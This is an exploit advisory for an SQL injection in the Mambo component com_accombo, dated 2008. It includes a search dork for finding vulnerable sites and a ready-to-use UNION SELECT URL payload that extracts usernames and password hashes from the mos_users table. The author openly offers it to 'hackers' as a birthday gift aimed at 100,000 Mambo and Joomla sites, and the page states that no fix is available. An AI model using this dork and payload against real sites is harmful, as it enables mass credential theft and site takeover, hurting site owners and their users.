Mambo Component accombo 1.x (id) SQL Injection Vulnerability

2008-03-19 00:00:00

##########################################
#
# Mambo Component com_accombo SQL Injection
#
##########################################
#
##AUTHOR : S@BUN
#
####HOME : http://www.milw0rm.com/author/1334
#
####MAİL : [email protected]
#
############################################
TODAY MY BİRTDAY
SOO I WROTE 5 BUGS ALL FOR HACKERS
5 EXPLOİTS HAVE 100.000 MAMBO-JOOMLA WEBPAGES OR MUCH MORE
DONT FORGET MY PRESENT HACKERS
GOOD LUCKY

100.000 DEN FAZLA MAMBO NE JOOMLA WEBSiTESi
YASGUNUM NEDENiYLE HEDiYE
iYi SANLAR

you can see all my exploits

http://my.opera.com/SQL-Injection/blog/

###########################################
#
# DORK 1 : allinurl: "com_accombo"
#
###########################################
EXPLOIT :

index.php?option=com_accombo&func=detail&Itemid=S@BUN&id=-99999/**/union/**/select/**/0,1,0x3a,3,4,5,6,7,8,9,10,11,12,concat(username,0x3a,password)/**/from/**/mos_users/*


###########################################
##################S@BUN####################
###########################################
#####[email protected]#####
###########################################

side note:
<name>accombo</name>
<creationDate>29/02/2004</creationDate>
<author>Niall McCullagh</author>
<copyright>This component is released under the GNU/GPL License</copyright>
<authorEmail>[email protected]</authorEmail>

<authorUrl>mambo.glenelly.net</authorUrl>
<version>1.4</version>
<description>Accombo is a Mambo accommodation advertising component.</description>

#

Fixes

No fixes

Per poter inviare un fix è necessario essere utenti registrati.